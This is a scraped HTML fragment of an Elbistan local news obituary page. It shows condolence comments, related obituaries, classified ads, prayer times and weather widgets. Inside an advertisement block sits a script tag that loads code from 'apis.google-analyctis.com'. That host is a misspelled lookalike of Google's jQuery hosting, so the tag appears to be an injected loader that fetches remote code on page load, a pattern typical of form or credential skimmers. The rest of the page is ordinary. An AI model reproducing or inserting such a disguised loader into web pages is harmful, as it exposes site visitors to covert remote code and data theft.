name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="5924617eb909d871bc489ced885016a4266f1683" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> <div id="comment_list"> <div class="comment_box row-fluid" id="comment_289995"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Sami atmaca</b> <small class="time">6 saat önce</small> <p class="text">Allah rahmet eylesin mekanı cennet olsun</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Sami atmaca" id="289995"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like289995" onclick="like(289995,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike289995">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike289995" onclick="like(289995,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike289995">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_289997"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Hacı Bekir CENGİZLER</b> <small class="time">6 saat önce</small> <p class="text">Allahım rahmet eylesin mekanı cennet olsun</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Hacı Bekir CENGİZLER" id="289997"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like289997" onclick="like(289997,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike289997">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike289997" onclick="like(289997,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike289997">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_290002"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>HÜSEYİN ÖNAT</b> <small class="time">5 saat önce</small> <p class="text">Allah rahmet eylesin mekanı cennet olsun. Sevdiklerine sabırlar diliyorum. Başınız sağolsun.</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@HÜSEYİN ÖNAT" id="290002"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like290002" onclick="like(290002,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike290002">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike290002" onclick="like(290002,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike290002">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_290004"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>cuma eser</b> <small class="time">5 saat önce</small> <p class="text">merhuma Allah tan rahmet ailesi ve yakınlarına baş saglıgı dilerim</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@cuma eser" id="290004"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like290004" onclick="like(290004,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike290004">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike290004" onclick="like(290004,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike290004">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_290005"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>KAZIM DAVUTOĞLU</b> <small class="time">5 saat önce</small> <p class="text">ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@KAZIM DAVUTOĞLU" id="290005"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like290005" onclick="like(290005,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike290005">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike290005" onclick="like(290005,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike290005">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_290006"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Hacı Durdu CEHİZ</b> <small class="time">5 saat önce</small> <p class="text">Merhuma Allah&#39;tan Rahmet, yakınlarına ve tüm sevenlerine başsağlığı dilerim.Mekanı Cennet olsun.Çevre ve Şehircilik İl Müdürlüğü-sakarya</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Hacı Durdu CEHİZ" id="290006"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like290006" onclick="like(290006,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike290006">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike290006" onclick="like(290006,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike290006">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_290007"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Kazim DAVUTOGLU</b> <small class="time">5 saat önce</small> <p class="text">ALLAH RAHMET EYLESIN MEKANI CENNET OLSUN</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Kazim DAVUTOGLU" id="290007"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like290007" onclick="like(290007,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike290007">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike290007" onclick="like(290007,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike290007">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_290009"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Ali Akarsu İstanbul</b> <small class="time">5 saat önce</small> <p class="text">Allah rahmet eylesin mekanı cennet olsun Ailesine sabırlar dilerim</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Ali Akarsu İstanbul" id="290009"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like290009" onclick="like(290009,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike290009">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike290009" onclick="like(290009,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike290009">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> </div> <!-- #comment_list --> <div class="row-fluid" style="margin-top:10px;"> <a href="javascript:void(0)" onclick="centerModal('http://www.elbistaninsesi.com/comment-read-haber-65770.html',630,500)" class="all_comments pull-right btn btn-warning">Tüm Yorumlar</a> </div> </div> <!-- .tab-pane --> <div class="tab-pane yorumlar fbpanel" id="facebookpanel"> <div class="row-fluid"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-comments" data-href="http://www.elbistaninsesi.com/vefatlar/ahmet-odemis-77-yasinda-h65770.html" data-width="603" data-colorscheme="light" data-numposts="10"></div> </div> <!-- #facebookpanel --> </div> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/hasan-unsal-71-yasinda-h65771.html" title="Hasan Ünsal 71 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/hasan_unsal_71_yasinda_h65771_d2cfd.jpg" alt="Hasan Ünsal 71 yaşında" /> <span>Hasan Ünsal 71 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/fikriye-kilinc-h65769.html" title="Fikriye Kılınç"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/fikriye_kilinc_h65769_4b9e1.jpg" alt="Fikriye Kılınç" /> <span>Fikriye Kılınç</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/adil-olker-41-yasinda-h65760.html" title="Adil Ölker 41 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/adil_olker_41_yasinda_h65760_13346.jpg" alt="Adil Ölker 41 yaşında" /> <span>Adil Ölker 41 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/emis-firtana-h65759.html" title="Emiş FIRTANA"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/emis_firtana_h65759_6a26c.jpg" alt="Emiş FIRTANA" /> <span>Emiş FIRTANA</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/ramazan-ucan-77-yasinda-h65758.html" title="Ramazan Uçan 77 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/ramazan_ucan_77_yasinda_h65758_b96cc.jpg" alt="Ramazan Uçan 77 yaşında" /> <span>Ramazan Uçan 77 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/recep-ates-79-yasinda-h65752.html" title="Recep Ateş 79 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/recep_ates_79_yasinda_h65752_4d9d0.jpg" alt="Recep Ateş 79 yaşında" /> <span>Recep Ateş 79 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/nimet-zedeli-92-yasinda-h65749.html" title="Nimet Zedeli 92 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/nimet_zedeli_92_yasinda_h65749_cc37b.jpg" alt="Nimet Zedeli 92 yaşında" /> <span>Nimet Zedeli 92 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-h65744.html" title="Vefat - Teşekkür"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/vefat_tesekkur_h65744_d1729.jpg" alt="Vefat - Teşekkür" /> <span>Vefat - Teşekkür</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mhtoki-de-3ncu-kat-31-kiralik-daire-12297.html" title="YEŞİLYURT MH.TOKİ DE 3.NCÜ KAT 3+1 KİRALIK DAİRE" >YEŞİLYURT MH.TOKİ DE 3.NCÜ KAT 3+1 KİRALIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/yesilyurt-mhtoki-de-3ncu-kat-31-kiralik-daire-12297.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/b497a907ef2312891928f6fa401401936b494884.jpg" alt="YEŞİLYURT MH.TOKİ DE 3.NCÜ KAT 3+1 KİRALIK DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/rehabilitasyon-merkezi-12294.html" title="Rehabilitasyon merkezi" >Rehabilitasyon merkezi</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/rehabilitasyon-merkezi-12294.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Rehabilitasyon merkezi" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-625m2-tepebasinda-12290.html" title="Satılık arsa 625m2 tepebaşında" >Satılık arsa 625m2 tepebaşında</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-625m2-tepebasinda-12290.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/d26e78aac40f140a016c3d861af0532ea0b80555.jpg" alt="Satılık arsa 625m2 tepebaşında" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/cam-tuplu-gunes-enerjisi-12289.html" title="cam tüplü güneş enerjisi" >cam tüplü güneş enerjisi</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/cam-tuplu-gunes-enerjisi-12289.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="cam tüplü güneş enerjisi" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/57m2-satilik-is-yeri-12287.html" title="57m2 satılık iş yeri" >57m2 satılık iş yeri</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/57m2-satilik-is-yeri-12287.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="57m2 satılık iş yeri" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-is-yeri-108m2-12284.html" title="Satılık iş yeri 108m2" >Satılık iş yeri 108m2</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-is-yeri-108m2-12284.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/e650f4d078ce7f0f366a23fbddc0cba87a5f106f.jpg" alt="Satılık iş yeri 108m2" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/makine-muhendisi-is-ilani-12280.html" title="Makine Mühendisi iş ilanı" >Makine Mühendisi iş ilanı</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/makine-muhendisi-is-ilani-12280.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Makine Mühendisi iş ilanı" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/yatirimlik-is-yeri-12275.html" title="Yatırımlık iş yeri" >Yatırımlık iş yeri</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/yatirimlik-is-yeri-12275.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Yatırımlık iş yeri" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12269.html" title="SATILIK DAİRE" >SATILIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12269.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATILIK DAİRE" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/iste-firsat-12262.html" title="İŞTE FIRSAT!" >İŞTE FIRSAT!</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/iste-firsat-12262.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="İŞTE FIRSAT!" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-uc-katli-is-yeri-12258.html" title="Satılık üç katlı iş yeri" >Satılık üç katlı iş yeri</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-uc-katli-is-yeri-12258.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/c998482ea0780caf3893a39580a64e82644948c9.jpg" alt="Satılık üç katlı iş yeri" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-uc-katli-is-yeri-12257.html" title="Satılık üç katlı iş yeri" >Satılık üç katlı iş yeri</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-uc-katli-is-yeri-12257.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/f3ae24ce91c262c7d18ac80f258f15bd563321c2.jpg" alt="Satılık üç katlı iş yeri" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/elbistan-alfa-temizlik-12256.html" title="Elbistan Alfa temizlik" >Elbistan Alfa temizlik</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/elbistan-alfa-temizlik-12256.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Elbistan Alfa temizlik" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-is-yeri-406m2-12254.html" title="Satılık iş yeri 406m2" >Satılık iş yeri 406m2</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-is-yeri-406m2-12254.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/69a82069da6929cea599df52a3ed39f70c0ce7e0.jpg" alt="Satılık iş yeri 406m2" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/devren-satilik-borek-salonu-12253.html" title="DEVREN SATILIK BÖREK SALONU" >DEVREN SATILIK BÖREK SALONU</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/devren-satilik-borek-salonu-12253.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="DEVREN SATILIK BÖREK SALONU" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="http://facebook.com/elbistaninsesi" target="blank" id="likes"></a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="http://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="http://twitter.com/elbistaninsesi" target="blank" id="followers"></a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="http://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/meteorolojiden-kar-uyarisi-h65518.html" title="Meteorolojiden kar uyarısı" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/meteorolojiden_kar_uyarisi_h65518_b5392.jpg" alt="Meteorolojiden kar uyarısı" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/meteorolojiden-kar-uyarisi-h65518.html" title="" ><span class="en-hit">1.</span> <strong>Meteorolojiden kar uyarısı</strong> <span class="en-spot en-hidden">Meteoroloji Genel Müdürlüğü’nün tahminlerine göre Elbistan, bu...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elazig-depremi-elbistan-i-salladi-h65499.html" title="Elazığ depremi Elbistan#039;ı salladı" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/elazig_depremi_elbistan_i_salladi_h65499_58c71.jpeg" alt="Elazığ depremi Elbistan#039;ı salladı" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elazig-depremi-elbistan-i-salladi-h65499.html" title="" ><span class="en-hit">2.</span> <strong>Elazığ depremi Elbistan&#039;ı salladı</strong> <span class="en-spot en-hidden">Elazığ depremi Elbistan&#039;ı salladı</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-gecikmis-buyuk-deprem-riski-suruyor-h65506.html" title="Elbistanda gecikmiş büyük deprem..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/elbistanda_gecikmis_buyuk_deprem_riski_suruyor_h65506_81a3b.jpg" alt="Elbistanda gecikmiş büyük deprem..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-gecikmis-buyuk-deprem-riski-suruyor-h65506.html" title="" ><span class="en-hit">3.</span> <strong>Elbistan’da gecikmiş büyük deprem...</strong> <span class="en-spot en-hidden">Elazığ’ın Sivrice ilçesindeki 6.8 büyüklüğündeki depremin ardından...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/ekinozulu-sehidin-aci-haberi-baba-ocagina-ulasti-h65637.html" title="Ekinözülü şehidin acı haberi baba..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/ekinozulu_asker_sehit_oldu_h65637_c194b.jpg" alt="Ekinözülü şehidin acı haberi baba..." 